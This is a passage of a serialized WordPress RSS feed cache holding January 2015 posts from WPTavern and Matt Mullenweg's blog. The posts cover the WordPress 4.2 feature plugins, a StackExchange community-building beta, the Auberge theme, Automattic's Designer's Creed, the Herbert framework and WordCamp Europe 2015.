for WordPress 4.2</a>, is already making headway into improving the model. Unlike previous release cycles, feature plugins that are likely to be merged into WordPress have been <a title=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\" href=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\">assigned a core mentor</a> at the beginning of the cycle. Assigning mentors at the beginning of the dev cycle should help make the merge process smoother and keep each project within scope.</p>\n<h2>Improved Communication</h2>\n<p>One of the biggest issues I have with feature plugins is the lack of communication regarding their progress on the <a title=\"https://make.wordpress.org/core/\" href=\"https://make.wordpress.org/core/\">Make Core</a> blog. This issue is being addressed with weekly updates that explain what’s changed, things to test, and where focus is needed. The following plugins are candidates that may be included in 4.2:</p>\n<ul>\n<li><a title=\"https://wordpress.org/plugins/press-this/\" href=\"https://wordpress.org/plugins/press-this/\">Press This</a> – Uses the <a title=\"https://make.wordpress.org/core/tag/press-this/\" href=\"https://make.wordpress.org/core/tag/press-this/\">Press This tag</a> on the Make Core blog.</li>\n<li><a title=\"https://wordpress.org/plugins/customizer-theme-switcher/\" href=\"https://wordpress.org/plugins/customizer-theme-switcher/\">Customizer Theme Switcher</a> – Uses the <a title=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\" href=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\">Customer Theme Switcher</a> tag on the Make Core blog.</li>\n</ul>\n<h2>Improved Testing Opportunities</h2>\n<p>If you browse to the Add New plugins screen in a development version of WordPress, you’ll see a Beta Testing tab. The tab provides easy access to feature plugins that are currently in development. My primary gripe with testing feature plugins is that they’re usually not synched with their Github counterparts where most of the development occurs.</p>\n<p>WordPress core developer, Dion Hulse, <a title=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\" href=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\">created a script</a> specifically to sync feature plugins on Github to the WordPress plugin directory. This allows feature plugins to have nightly releases which are available from the plugin directory. This small but important change makes it a lot easier to keep up with and upgrade feature plugins.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38225\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png?resize=1025%2C382\" alt=\"WordPress 4.2 Feature Plugin Beta Testing Tab\" /></a>WordPress 4.2 Feature Plugin Beta Testing Tab\n<p>It’s still early in the development cycle, but I’m impressed with Jaynes organizational abilities. He’s addressed some of the largest pain points to the feature plugin process. If the changes put the experimental model back on track, future lead developers will have an easier time managing the program.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:32:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"WPTavern: StackExchange Community Building Beta Provides a Valuable Resource for Digital Community Managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38086\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://wptavern.com/stackexchange-community-building-beta-provides-a-valuable-resource-for-digital-community-managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5295:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg\" rel=\"prettyphoto[38086]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg?resize=1025%2C505\" alt=\"plants\" class=\"aligncenter size-full wp-image-38240\" /></a></p>\n<p>Online community building is like gardening. Whether you’re running an active blog, moderating forums, or managing a social network, you will encounter challenges in maintaining growth. Experienced community builders have a wealth of knowledge to share with those who are new to it, especially when it comes to recognizing and mitigating toxic elements, fertilizing to encourage growth, and responding to community changes.</p>\n<p>Last year, StackExchange opened a <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> to test the waters for a new Q&A site dedicated to building, administering, managing, and cultivating digital communities. It’s been in beta for approximately six months and has attracted 877 users with an impressive 100% of questions answered.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png\" rel=\"prettyphoto[38086]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png?resize=765%2C549\" alt=\"community-building-stackexchange\" class=\"aligncenter size-full wp-image-38214\" /></a></p>\n<p>While the Q&A site is not oriented around WordPress (<a href=\"http://wptavern.com/wordpress-stackexchange-thrives-in-2014-with-17-million-page-views-and-14k-new-questions\" target=\"_blank\">WP Developers have their own thriving Stackexchange</a>), many of the questions and topics relate to issues that WordPress site managers deal with every day:</p>\n<ul>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/965/how-do-you-choose-the-software-that-runs-your-community\" target=\"_blank\">How do you choose the software that runs your community?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/964/cant-watch-24x7-how-do-we-keep-comments-under-control\" target=\"_blank\">Can’t watch 24×7; how do we keep comments under control?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/840/how-to-handle-a-shill\" target=\"_blank\">How to handle a shill?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/972/forum-war-because-of-a-new-rule-and-a-banned-user\" target=\"_blank\">Forum war because of a new rule and a banned user</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/1009/pitfalls-to-avoid-when-transferring-community-ownership\" target=\"_blank\">Pitfalls to avoid when transferring community ownership?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/986/do-long-term-icebreaker-threads-foster-quality-discussion\" target=\"_blank\">Do long-term “icebreaker” threads foster quality discussion?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/950/how-and-when-do-i-attract-experts-to-a-young-site-that-doesnt-yet-have-much-exp\" target=\"_blank\">How and when do I attract experts to a young site that doesn’t yet have much expert content?</a></li>\n</ul>\n<p>WordPress users have a diverse array of community building software available to them for creating interactive comments, forums, and social networking sites. These plugins make it possible for anyone to build a community, even with very little technical knowledge. However, even with the best tools at your disposal, a community is an organic thing that requires skill and dedication to cultivate.</p>\n<p>New community managers are eager to learn how to chase rabbits and moles out of their gardens while not disrupting community growth, as evidenced by the many questions submitted regarding managing user behavior. The “<a href=\"http://communitybuilding.stackexchange.com/questions/tagged/problem-users\" target=\"_blank\">problem-users</a>” tag is so far one of the most popular on the site, followed by other related topics, such as conflict resolution, new users, content curation, forums, and site growth.</p>\n<p>This new Q&A site is still <a href=\"http://area51.stackexchange.com/proposals/52070/moderators\" target=\"_blank\">navigating through its beta period</a> but still needs to demonstrate progress. So far, the beta is healthy in terms of questions getting answered, but it needs to generate more questions on a daily basis, attract more experienced members, and gain more traffic before it can graduate from its final beta.</p>\n<p>Part of the StackExchange mission is to provide answers without distraction for users who are asking practical, detailed questions. The new <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> site is not a place to vent but rather a place to get solid, actionable advice from experienced community managers. This site is an excellent resource for anyone who is involved in online community building, even if you simply have a blog that receives a steady stream of comments. If you want to contribute, sign up at <a href=\"http://stackexchange.com/\" target=\"_blank\">StackExchange</a> to get started.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:11:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Auberge: A Beautiful Free Restaurant Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38161\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/auberge-a-beautiful-free-restaurant-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4671:\"<p>Restaurant themes don’t often land in the WordPress Themes Directory. In fact, there are barely <a href=\"https://wordpress.org/themes/search.php?q=restaurant\" target=\"_blank\">a dozen</a> listed among the 3,000+ themes on WordPress.org.</p>\n<p>One problem with many commercial restaurant themes is that they are usually marketed as a complete package with everything built into the theme, including menu management. The lack of separation of menu data from the theme means that users are locked into that theme and their content is not transferable.</p>\n<p>That’s not the case with <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a>, a new free theme from Oliver Juhas of <a href=\"http://www.webmandesign.eu/\" target=\"_blank\">WebMan Design</a>. Last week we featured Juhas’ <a href=\"http://wptavern.com/modern-a-beautiful-free-blog-and-portfolio-theme-for-wordpress\" target=\"_blank\">Modern</a> theme, which was built to showcase portfolios. Modern requires Jetpack for managing portfolio posts, and Auberge takes the same approach for menus.</p>\n<p>The theme’s home page features a large header image, with blog posts and/or an optional food menu preview displayed beneath.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg?resize=880%2C660\" alt=\"auberge\" class=\"aligncenter size-full wp-image-38163\" /></a></p>\n<p>Check out the <a href=\"http://themedemos.webmandesign.eu/auberge/\" target=\"_blank\">live demo</a> to see how the <a href=\"http://themedemos.webmandesign.eu/auberge/menu/\" target=\"_blank\">menu page</a> is divided into sections. The menus are responsive and each item can be assigned an image, price, and description.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg?resize=1025%2C752\" alt=\"auberge-menu\" class=\"aligncenter size-full wp-image-38183\" /></a></p>\n<p>Auberge requires the <a href=\"https://wordpress.org/plugins/webman-amplifier/\" target=\"_blank\">WebMan Amplifier</a> plugin, available on WordPress.org, in order to extend the theme to include the custom “ingredients” taxonomy and recipe metaboxes. The theme also requires <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a> to support many of the features you see in the demo, including:</p>\n<ul>\n<li>Food menu posts</li>\n<li>Featured content setup (banner area)</li>\n<li>Tiled galleries</li>\n<li>Image lightbox zooming effect</li>\n<li>Infinite Scroll</li>\n<li>Sharing buttons</li>\n<li>Site icon, favicon, and image logo</li>\n<li>Related posts, CDN, etc</li>\n</ul>\n<p>Auberge utilizes WordPress’ native customizer to offer layout options for the placement of the blog posts and food menu sections on the home page. You can also customize the header background and text colors, accent color, footer and widget colors. The customizer also contains options to set the basic font size and select Google Font combinations based on recommendations from the <a href=\"http://femmebot.github.io/google-type/\" target=\"_blank\">Google Web Fonts Typographic Project</a>.</p>\n<p>If you like the layouts seen in the demo site, the theme’s author has prepared all the markup for each page to copy into your pages. You can find this in the “Demo Content Page Layouts” section of the theme’s <a href=\"http://www.webmandesign.eu/manual/auberge/\" target=\"_blank\">documentation</a>.</p>\n<p>Auberge has support for post formats as well as the unique ability to split posts and pages into <a href=\"http://themedemos.webmandesign.eu/auberge/post-parts/\" target=\"_blank\">multiple parts</a>. It also supports Schema.org markup, Google Recipe View, and Theme Hook Alliance action hooks.</p>\n<p>Auberge was built based on Automattic’s <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a> starter theme. Juhas designed it to be lean, so any extra functionality comes in the form of plugins. The theme itself contains no shortcodes, sliders, or page builders.</p>\n<p>If you’re looking for a restaurant or cafe theme that includes menu content the right way, <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a> is a solid option. It allows you to select a different theme further down the road without losing all of your content. You can find it via your admin themes browser or <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">download</a> it directly from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 20:20:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Designer’s Creed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44644\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/designers-creed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1790:\"<p>You might remember a <a href=\"http://ma.tt/2011/09/automattic-creed/\">few years back I talked about why Automattic has a creed, and shared ours</a>. Here it is again:</p>\n<blockquote><p>I will never stop learning. I won’t just work on things that are assigned to me. I know there’s no such thing as a status quo. I will build our business sustainably through passionate and loyal customers. I will never pass up an opportunity to help out a colleague, and I’ll remember the days before I knew everything. I am more motivated by impact than money, and I know that Open Source is one of the most powerful ideas of our generation. I will communicate as much as possible, because it’s the oxygen of a distributed company. I am in a marathon, not a sprint, and no matter how far away the goal is, the only way to get there is by putting one foot in front of another every day. Given time, there is no problem that’s insurmountable.</p></blockquote>\n<p>One of the parts of <a href=\"http://automattic.com/\">Automattic</a> that has grown the most over the past few years is our design corps, now over two dozen people. This group, led by creative director <a href=\"http://davemart.in/\">Dave Martin</a>, has come up with a supplemental Designer’s Creed for followers of their craft at A8C:</p>\n<blockquote><p>I take pride in my craft. I ensure that everyone — regardless of ability or device — can use my designs. I routinely ask for feedback, even when it’s uncomfortable. I regularly watch people use my designs, because testing leads to clarity. I will never stop at “good enough.”</p></blockquote>\n<p><a href=\"http://davemart.in/2015/01/24/the-automattic-designers-creed/\">You can read more about it on Dave’s blog. »</a></p>\n<p> </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 01:15:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Herbert: A New WordPress Plugin Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38040\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wptavern.com/herbert-a-new-wordpress-plugin-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4069:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg\" rel=\"prettyphoto[38040]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg?resize=831%2C405\" alt=\"herbert\" class=\"aligncenter size-full wp-image-38128\" /></a></p>\n<p>WordPress plugin authors have a great deal of liberty when it comes to structuring and organizing their code. There’s no prescribed file structure, so when you look under the hood of a plugin, you often need to poke around a bit to find out how the author is organizing things.</p>\n<p>Jason Agnew found this to be confusing when he went to build his first WordPress plugin. Agnew is the technical director at <a href=\"http://bigbitecreative.com/\" target=\"_blank\">Big Bite Creative</a>, located in Middlesbrough, England. He often collaborates with both front and back end developers on projects, which drove him to find a better way to write plugins that are organized for multiple team members.</p>\n<p>This week Agnew introduced <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a>, a new open source framework for building WordPress plugins. “We believe the current approach to building plugins is unorganized and difficult to understand,” Agnew said. “It makes working in teams or taking over from a previous developer time consuming. Its early days for Herbert but our aim is to solve this.”</p>\n<p>Prior to creating Herbert with his team, Agnew did his homework to see if there was an existing tool to solve this problem. He discovered the <a href=\"http://wptavern.com/wordpress-plugin-boilerplate-3-0-released-with-new-community-website\" target=\"_blank\">WordPress Plugin Boilerplate</a> project, but determined that it wouldn’t work for his agency’s needs. “Although WPPB would be a great starting point, it seemed best suited to the quick development of smaller plugins,” Agnew said. “We needed something more suited to scale.”</p>\n<p>He checked out some of the most popular WordPress plugins, hoping to find a common thread among them for a semantic, structured method of plugin creation. “To our surprise, there wasn’t any sense of uniformity or consistency of implementation among them,” he said. At that point, he rallied his team to write their own WordPress plugin framework.</p>\n<p>The open source <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a> project was born out of this effort. The framework aims to keep business logic separate from template code, so that back and frontend developers aren’t tripping over each other. “It offers a file structure to keep your code organised, with a solution as simple as all your routes belonging in the plugin/routes.php file,” Agnew said. “It no longer ties you or your development team to the WordPress Database Object ($wpdb), allowing you to use the power and effectiveness of <a href=\"http://laravel.com/docs/4.2/eloquent\" target=\"_blank\">Laravel’s Eloquent ORM</a> to handle your database queries.”</p>\n<p>Herbert utilizes Composer to handle the framework’s dependencies. Template code is stored in <a href=\"http://getherbert.com/dev/views\" target=\"_blank\">views</a>, which uses the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine. The framework may not be everyone’s cup of tea. However, if you like separating your code into routes, views, and controllers, then Herbert may save you some time when spinning up new plugins.</p>\n<p>The Big Bite Creative team plans to maintain the framework and will add plugin examples in the future. “We plan to introduce an interface to the WordPress post object for Eloquent, along with tests for your code,” Agnew said. They are also considering adding a WordPress-specific frontend framework to work alongside Herbert. The project is open to contribution, so feel free to fork Herbert on <a href=\"https://github.com/getherbert/herbert/\" target=\"_blank\">GitHub</a> and send code back to the team.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 23:55:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Chris Lema’s Session From PressNomics 3 on Managing Time and Energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38135\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/chris-lemas-session-from-pressnomics-3-on-managing-time-and-energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:968:\"<p>One of my favorite sessions at <a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">PressNomics 3</a> is now <a title=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\" href=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\">available to watch for free</a> on YouTube. Although sessions weren’t recorded or live streamed, Chris Lema used his own gear to record his presentation. He shares the lessons he’s learned throughout his career on managing time and energy.</p>\n<p>One of my favorite tips is writing down three things you want to get done each day. Each completed task builds confidence and over time, you end up with a lot of accomplishments. So far, the technique is working and as long as I complete two out of three tasks each day, I feel pretty good about myself.</p>\n<p><span class=\"embed-youtube\"></span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 22:23:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Seville, Spain to Host WordCamp Europe 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38031\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://wptavern.com/seville-spain-to-host-wordcamp-europe-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3322:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg\" rel=\"prettyphoto[38031]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg?resize=1025%2C505\" alt=\"seville\" class=\"aligncenter size-full wp-image-38107\" /></a></p>\n<p>The WordCamp Europe organization team <a href=\"http://europe.wordcamp.org/2015/wceu-2015-lets-go/\" target=\"_blank\">announced</a> today that the 2015 event will be held in Seville, Spain from June 26 – 28 at the <a href=\"http://www.hotelbarcelorenacimiento.com/\" target=\"_blank\">Barceló Gran Hotel Renacimiento</a>. Last year’s <a href=\"http://wptavern.com/wordpress-beyond-boundaries-a-recap-of-wordcamp-europe-2014\" target=\"_blank\">WordCamp in Sofia, Bulgaria</a> was a tremendous success with nearly 800 attendees, a world-class speaker lineup, and a strong local community of volunteers.</p>\n<p>Ordinarily, the WCEU organizers select a host city based on applications from various European WordPress communities after an open call. However, this year is an exception. WordCamp Central prevailed upon the team to have the event in late spring or summer in order to accommodate WordCamp US, which is expected to take place in the fall.</p>\n<p>“As we had to move WordCamp Europe to the first half of the year, we were quite limited in time,” organizer Petya Raykovska said. “So instead of publishing an open call for applications, we decided to reach out to some of the best established WordPress communities in Europe that have experienced teams of local organizers and asked them to prepare bids to host WCEU 2015. We received three very good applications from three different teams.”</p>\n<p>The WCEU organization team landed on Seville after considering various factors, such as the local organizers’ preparation of the budget and venue research. “We chose Seville because of the excellent job they did with the application,” Raykovska said. “But also because of the great, experienced local team, because it’s a great location with a very different vibe from Sofia – it’s affordable, well connected with the rest of Europe, and has a very strong local WordPress community.”</p>\n<p>The WordPress community in Seville has held a local <a href=\"https://twitter.com/wcsevilla\" target=\"_blank\">WordCamp</a> for the past several years. The city’s metropolitan area has approximately 1.5 million residents, making it a decent-sized city for hosting an event. Attendees should expect to pack for warm weather, as the Seville’s average high temperatures in the summer often reach above 35 °C.</p>\n<p><a href=\"http://siobhanmckeown.com/\" target=\"_blank\">Siobhan McKeown</a> will be leading a team of 18 <a href=\"http://europe.wordcamp.org/2015/organizers/\" target=\"_blank\">organizers</a> for the 2015 event, including five experienced local organizers and a global team of organizers from all over Europe.</p>\n<p>Tickets will go on sale at the beginning of February, and the organization team will be calling for speakers and sponsors in the next few days. Unlike last year’s event, WordCamp Europe 2015 will include interpretation for the local language. While all sessions will be given in English, a Spanish translation will be offered 